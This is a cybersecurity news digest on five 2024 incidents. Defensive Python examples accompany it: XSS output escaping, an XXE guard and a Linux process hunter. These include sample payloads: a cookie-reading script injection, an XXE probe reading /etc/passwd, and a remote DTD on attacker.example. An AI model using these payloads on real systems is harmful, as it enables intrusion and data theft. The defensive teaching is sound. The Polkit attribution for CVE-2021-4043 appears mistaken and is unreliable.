Weekly Cybersecurity Digest: Top 5 News Stories in the Digital Sphere

1. U.S. and Microsoft Seize 107 Russian Domains in Major Cyber Fraud Crackdown

In a significant joint effort, the U.S. Department of Justice and Microsoft have seized 107 domains used by a Russian state-sponsored threat actor: the DoJ seized 41 of them under a court order, and Microsoft's Digital Crimes Unit took the remaining 66 through a civil action. The domains supported spear-phishing campaigns attributed to COLDRIVER (aka Star Blizzard), a group linked to Russia's Federal Security Service (FSB), aimed at harvesting credentials and sensitive information from U.S. government and civil society targets. The group went after NGOs, think tanks, journalists, and current and former military and intelligence officials, particularly those aligned with Ukraine and NATO interests. This action follows sanctions against two members of the group by the U.S. and U.K. in December 2023 and later by the European Council.

Key Points:

  • Threat Actor: COLDRIVER (also known as BlueCharlie, Star Blizzard, etc.)
  • Impact: Targeted U.S. government, NGOs, military officials, and intelligence sectors.
  • Objective: Credential harvesting via spear-phishing campaigns.
  • Actions Taken: Seizure of 107 domains (41 by the DoJ, 66 by Microsoft).

2. WordPress LiteSpeed Cache Plugin Security Flaw Exposes Sites to XSS Attacks

A stored cross-site scripting (XSS) vulnerability has been identified in the widely used LiteSpeed Cache plugin for WordPress, affecting all versions up to and including 6.5.0.2. The flaw, tracked as CVE-2024-47374 with a CVSS score of 7.2 (high), lets an unauthenticated attacker store arbitrary JavaScript that then executes in the browser of anyone who loads the affected page, including logged-in administrators. It stems from the plugin writing the value of the "X-LSCACHE-VARY-VALUE" HTTP request header into its output without sanitization or escaping; a script running in an administrator's session can be used for privilege escalation, data theft, or complete website takeover. The issue was fixed in version 6.5.1.

Key Points:

  • CVE-2024-47374 (CVSS 7.2): Stored XSS allowing execution of arbitrary JavaScript in visitors' browsers, with no authentication required.
  • Impact: Sites running LiteSpeed Cache versions <= 6.5.0.2 are vulnerable.
  • Exploit Requirements: The Page Optimization settings "CSS Combine" and "Generate UCSS" must be enabled.
  • Mitigation: Update to version 6.5.1 or later immediately.
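The bug class above, as an added example that is not LiteSpeed's code: a toy page cache that varies its output on a request header, with the vulnerable rendering beside a hardened one. The header name is the real one from the advisory; where LiteSpeed actually wrote the value into its output is not reproduced here, and the HTML-comment placement, the allow-list pattern, and the sample requests are assumptions made for illustration.

```python
# Added example (not LiteSpeed's code): an untrusted request header written
# into cached HTML. The placement in an HTML comment is an assumption.
import html
import re

VARY_HEADER = "X-LSCACHE-VARY-VALUE"

# Constructed requests: one attacker-controlled, one benign.
ATTACKER_REQUEST = {
    "path": "/",
    "headers": {VARY_HEADER: "--><script>alert(document.cookie)</script><!--"},
}
BENIGN_REQUEST = {"path": "/", "headers": {VARY_HEADER: "mobile_v2"}}

PAGE_BODY = "<html><body>Hello</body></html>"


def render_vulnerable(request: dict) -> str:
    """Vulnerable: the header value is written into the cached page verbatim.

    Because the page is cached, every later visitor (an administrator
    included) receives the attacker's script: a stored, not reflected, XSS.
    """
    vary = request["headers"].get(VARY_HEADER, "")
    return f"<!-- lscache vary: {vary} -->\n{PAGE_BODY}"


# A cache-variant tag only ever needs a short token; anything else is rejected.
# The exact character set is an assumption for this example.
_VARY_RE = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")


def render_hardened(request: dict) -> str:
    """Hardened: allow-list the value at input, then escape at output anyway.

    Rejecting malformed values outright is preferable to trying to "clean"
    them; html.escape() is kept as defence in depth in case the allow-list
    is loosened later.
    """
    vary = request["headers"].get(VARY_HEADER, "")
    if not _VARY_RE.match(vary):
        vary = ""
    return f"<!-- lscache vary: {html.escape(vary, quote=True)} -->\n{PAGE_BODY}"


def contains_script(page: str) -> bool:
    """Crude check used to compare the two renderers on the same request."""
    return "<script" in page.lower()


if __name__ == "__main__":
    print("vulnerable carries script:", contains_script(render_vulnerable(ATTACKER_REQUEST)))
    print("hardened carries script:  ", contains_script(render_hardened(ATTACKER_REQUEST)))
    print(render_hardened(BENIGN_REQUEST).splitlines()[0])
```

The same rule applies to any request header a plugin persists: treat it as attacker input even though it is not a form field, validate against the narrowest shape the feature needs, and escape on every output path.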

3. Alert: Adobe Commerce and Magento Stores Under Attack from CosmicSting Exploit

A vulnerability dubbed CosmicSting (CVE-2024-34102, CVSS score: 9.8) has been exploited to compromise an estimated 5% of Adobe Commerce and Magento stores globally. The flaw, an improper restriction of XML external entity references (XXE) reachable through the platform's REST API, allows unauthenticated arbitrary file read and, when chained with the CNEXT glibc iconv bug (CVE-2024-2961), remote code execution. Despite a patch being released in June 2024, many sites remain unpatched, and exploitation has escalated to an estimated 3-5 store compromises per hour.

Key Points:

  • CVE-2024-34102: Critical flaw allowing arbitrary file read, and remote code execution when chained with CNEXT.
  • Impact: Attackers read app/etc/env.php to obtain the Magento encryption (crypt) key, then forge API tokens that grant full administrative API access.
  • Attack Groups: Seven distinct groups have been exploiting the flaw, using different methods to inject payment skimmers and steal sensitive data.
  • Recommendations: Merchants must upgrade to a patched Magento/Adobe Commerce release, rotate the encryption key, and invalidate the old key; rotating alone is not enough if tokens signed with the old key are still accepted.
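The defensive side of the XXE class described above, as an added example that is neither Adobe's nor Magento's code: an XML intake guard built on Python's standard-library expat bindings that refuses any DTD (and therefore any entity declaration) before the real parser sees the document. The sample documents, including the file:// and remote-DTD probes and the attacker.example host, are constructed for this example; the handler names are expat's real ones.

```python
# Added example (not Adobe/Magento code): reject DTDs and external entities
# on untrusted XML before parsing it. Sample documents are constructed.
from typing import Optional
import xml.etree.ElementTree as ET
from xml.parsers import expat


class EntitiesForbidden(ValueError):
    """Raised when untrusted XML tries to declare or reference entities."""


def assert_no_dtd(xml_text: str) -> None:
    """Throwaway expat pass whose only job is to fail on <!DOCTYPE ...>.

    Entities can only be declared inside a DTD, so refusing the DOCTYPE
    refuses SYSTEM entities (file read), remote DTDs (out-of-band exfil)
    and entity-expansion bombs alike. The external-entity handler is kept
    as a second line of defence.
    """
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise EntitiesForbidden(f"DOCTYPE {name!r} not allowed (sysid={sysid!r})")

    def on_external_entity(context, base, sysid, pubid):
        raise EntitiesForbidden(f"external entity {sysid!r} not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.Parse(xml_text, True)


def parse_untrusted(xml_text: str) -> ET.Element:
    """Guard first, then parse with the normal tree parser."""
    assert_no_dtd(xml_text)
    return ET.fromstring(xml_text)


def rejection_reason(xml_text: str) -> Optional[str]:
    """None if the document is accepted, otherwise why it was refused."""
    try:
        parse_untrusted(xml_text)
    except EntitiesForbidden as exc:
        return str(exc)
    return None


# Constructed inputs: a benign order document, an in-band XXE probe that
# points an entity at a server file, and a blind variant that pulls a DTD
# from an attacker-controlled host.
BENIGN = "<order><id>1001</id><total>42.00</total></order>"
XXE_FILE_PROBE = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    "<order><id>&xxe;</id></order>"
)
XXE_REMOTE_DTD_PROBE = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE foo SYSTEM "http://attacker.example/evil.dtd">'
    "<order><id>1</id></order>"
)

if __name__ == "__main__":
    for label, doc in [("benign", BENIGN), ("file", XXE_FILE_PROBE),
                       ("remote dtd", XXE_REMOTE_DTD_PROBE)]:
        print(f"{label:10s} -> {rejection_reason(doc) or 'accepted'}")
```

In production the defusedxml package applies the same policy to every stdlib parser; the point of the hand-rolled version is to show that the decision has to be made at DOCTYPE time, not after an entity has already been resolved. The accompanying operational step from the advisory still stands: a store that was exposed must treat its crypt key as stolen and rotate it.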

4. New Perfctl Malware Targets Linux Servers for Cryptocurrency Mining and Proxyjacking

A stealthy malware family dubbed Perfctl has been discovered, primarily targeting Linux servers for cryptocurrency mining and proxyjacking. It uses several techniques to evade detection: it pauses its noisy activity when a user logs in, deletes its on-disk binary after launch and keeps running from memory, and adopts process names that resemble legitimate system processes. It exploits a Polkit vulnerability (CVE-2021-4043) to escalate privileges, after which it installs a cryptominer (perfcc) and, in some cases, proxyjacking software.

Key Points:

  • Target: Misconfigured and vulnerable Linux servers.
  • Exploit: CVE-2021-4043 (Polkit vulnerability) for privilege escalation.
  • Techniques: Runs from memory after deleting its on-disk binary, stays quiet while users are logged in, and mimics legitimate process names.
  • Impact: Installs cryptomining software and deploys proxyjacking payloads.
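Two of the behaviours above leave a footprint in procfs that a responder can hunt for without any vendor tooling. The following added example (not from the malware report or any vendor product) walks /proc on a Linux host and flags processes whose executable was unlinked after launch (the kernel appends " (deleted)" to the exe link target) and processes that use a system-daemon name while running from a writable staging directory. The procfs layout it reads is the real one; the directory list, the daemon-name list, and the fake procfs built by make_fake_proc() are assumptions constructed for this example.

```python
# Added example (not vendor code): hunt /proc for two perfctl-style traits.
# Directory and name heuristics below are starter assumptions, not IOCs.
import os
import tempfile
from typing import Dict, List, Optional

DELETED_SUFFIX = " (deleted)"
SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/root/.config/")
DAEMON_LIKE_NAMES = {"sh", "bash", "cron", "crond", "sshd", "kworker", "perf", "httpd"}


def inspect_process(proc_root: str, pid: str) -> Optional[Dict]:
    """Return findings for one PID, or None if it looks normal."""
    try:
        target = os.readlink(os.path.join(proc_root, pid, "exe"))
    except OSError:
        return None  # kernel thread, already exited, or EACCES when not root
    try:
        with open(os.path.join(proc_root, pid, "comm")) as fh:
            comm = fh.read().strip()
    except OSError:
        comm = ""

    findings: List[str] = []
    path = target
    if target.endswith(DELETED_SUFFIX):
        findings.append("exe unlinked after start")
        path = target[: -len(DELETED_SUFFIX)]
    if path.startswith(SUSPICIOUS_DIRS) and comm in DAEMON_LIKE_NAMES:
        findings.append("system-daemon name running from writable dir")
    if not findings:
        return None
    return {"pid": pid, "comm": comm, "exe": target, "findings": findings}


def hunt(proc_root: str = "/proc") -> List[Dict]:
    """Scan every numeric entry under proc_root; sorted for stable output."""
    hits = []
    for pid in sorted(p for p in os.listdir(proc_root) if p.isdigit()):
        result = inspect_process(proc_root, pid)
        if result:
            hits.append(result)
    return hits


def make_fake_proc() -> str:
    """Constructed procfs with one clean and two suspicious processes."""
    root = tempfile.mkdtemp(prefix="fakeproc_")
    spec = {
        "101": ("/usr/sbin/sshd", "sshd"),                 # legitimate
        "202": ("/tmp/.perf/perfcc (deleted)", "perfcc"),  # binary removed after launch
        "303": ("/dev/shm/.x/sh", "sh"),                   # shell staged in /dev/shm
    }
    for pid, (exe, comm) in spec.items():
        os.makedirs(os.path.join(root, pid))
        os.symlink(exe, os.path.join(root, pid, "exe"))  # dangling links are fine
        with open(os.path.join(root, pid, "comm"), "w") as fh:
            fh.write(comm + "\n")
    return root


if __name__ == "__main__":
    for hit in hunt(make_fake_proc()):
        print(hit)
    if os.path.isdir("/proc"):
        for hit in hunt("/proc"):
            print(hit)
```

Run it as root for full coverage: reading another user's /proc/PID/exe fails with EACCES, which the scanner silently skips. A " (deleted)" exe is not proof of compromise (package upgrades leave long-running daemons in the same state), so treat hits as leads to confirm with `ls -l /proc/PID/fd`, `cat /proc/PID/maps` and the process's parent chain.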

5. Cloudflare Thwarts Largest-Ever 3.8 Tbps DDoS Attack Targeting Global Sectors

Cloudflare has mitigated a record-breaking 3.8 Tbps Distributed Denial-of-Service (DDoS) attack that lasted 65 seconds. It was the peak of a month-long campaign in September 2024 of more than a hundred hyper-volumetric layer 3/4 attacks, many exceeding 2 billion packets per second, against targets in financial services, telecommunications, and the internet sector. The traffic came from a botnet of compromised devices, including ASUS home routers exploited through CVE-2024-3080 as well as MikroTik devices and DVRs, and consisted of UDP floods on a fixed port designed to exhaust the target's network bandwidth and the CPU of in-line packet-processing appliances, rendering services inaccessible.

Key Points:

  • Attack Volume: Peaked at 3.8 Tbps, the largest publicly disclosed at the time.
  • Botnet Origin: Devices in Vietnam, Russia, Brazil, and more.
  • Devices Exploited: ASUS routers via CVE-2024-3080.
  • Mitigation: Cloudflare's network auto-mitigated the attack; absorbing floods of this size requires capacity well beyond what a single origin or on-premises appliance can provide.
